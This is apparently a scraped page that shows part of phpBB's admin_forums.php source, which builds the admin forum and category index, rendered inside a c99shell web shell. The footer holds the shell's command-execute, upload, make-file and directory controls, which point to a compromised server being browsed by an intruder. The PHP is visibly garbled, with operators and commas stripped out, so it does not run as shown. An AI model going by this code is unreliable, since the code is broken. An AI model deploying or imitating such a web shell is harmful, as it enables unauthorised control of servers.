message_die(GENERAL_ERROR"Could not query forums information"""__LINE____FILE__$sql);
    }

    if( 
$total_forums $db->sql_numrows($q_forums) )
    {
        
$forum_rows $db->sql_fetchrowset($q_forums);
    }

    
//
    // Okay, let's build the index
    //
    
$gen_cat = array();

    for(
$i 0$i $total_categories$i++)
    {
        
$cat_id $category_rows[$i]['cat_id'];

        
$template->assign_block_vars("catrow", array( 
            
'S_ADD_FORUM_SUBMIT' => "addforum[$cat_id]"
            
'S_ADD_FORUM_NAME' => "forumname[$cat_id]"

            
'CAT_ID' => $cat_id,
            
'CAT_DESC' => $category_rows[$i]['cat_title'],

            
'U_CAT_EDIT' => append_sid("admin_forums.$phpEx?mode=editcat&amp;" POST_CAT_URL "=$cat_id"),
            
'U_CAT_DELETE' => append_sid("admin_forums.$phpEx?mode=deletecat&amp;" POST_CAT_URL "=$cat_id"),
            
'U_CAT_MOVE_UP' => append_sid("admin_forums.$phpEx?mode=cat_order&amp;move=-15&amp;" POST_CAT_URL "=$cat_id"),
            
'U_CAT_MOVE_DOWN' => append_sid("admin_forums.$phpEx?mode=cat_order&amp;move=15&amp;" POST_CAT_URL "=$cat_id"),
            
'U_VIEWCAT' => append_sid($phpbb_root_path."index.$phpEx?" POST_CAT_URL "=$cat_id"))
        );

        for(
$j 0$j $total_forums$j++)
        {
            
$forum_id $forum_rows[$j]['forum_id'];
            
            if (
$forum_rows[$j]['cat_id'] == $cat_id)
            {

                
$template->assign_block_vars("catrow.forumrow",    array(
                    
'FORUM_NAME' => $forum_rows[$j]['forum_name'],
                    
'FORUM_DESC' => $forum_rows[$j]['forum_desc'],
                    
'ROW_COLOR' => $row_color,
                    
'NUM_TOPICS' => $forum_rows[$j]['forum_topics'],
                    
'NUM_POSTS' => $forum_rows[$j]['forum_posts'],

                    
'U_VIEWFORUM' => append_sid($phpbb_root_path."viewforum.$phpEx?" POST_FORUM_URL "=$forum_id"),
                    
'U_FORUM_EDIT' => append_sid("admin_forums.$phpEx?mode=editforum&amp;" POST_FORUM_URL "=$forum_id"),
                    
'U_FORUM_DELETE' => append_sid("admin_forums.$phpEx?mode=deleteforum&amp;" POST_FORUM_URL "=$forum_id"),
                    
'U_FORUM_MOVE_UP' => append_sid("admin_forums.$phpEx?mode=forum_order&amp;move=-15&amp;" POST_FORUM_URL "=$forum_id"),
                    
'U_FORUM_MOVE_DOWN' => append_sid("admin_forums.$phpEx?mode=forum_order&amp;move=15&amp;" POST_FORUM_URL "=$forum_id"),
                    
'U_FORUM_RESYNC' => append_sid("admin_forums.$phpEx?mode=forum_sync&amp;" POST_FORUM_URL "=$forum_id"))
                );

            }
// if ... forumid == catid
            
        
// for ... forums

    
// for ... categories

}// if ... total_categories

$template->pparse("body");

include(
'./page_footer_admin.'.$phpEx);

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--